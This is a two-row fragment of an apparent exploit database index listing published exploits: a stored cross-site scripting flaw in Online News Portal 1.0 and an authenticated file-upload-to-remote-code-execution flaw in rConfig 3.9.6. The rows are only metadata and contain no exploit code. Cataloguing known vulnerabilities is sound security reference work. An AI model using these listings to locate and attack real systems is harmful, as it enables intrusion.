+49688,exploits/php/webapps/49688.txt,"Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting",2021-03-19,"Richard Jones",webapps,php,
49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,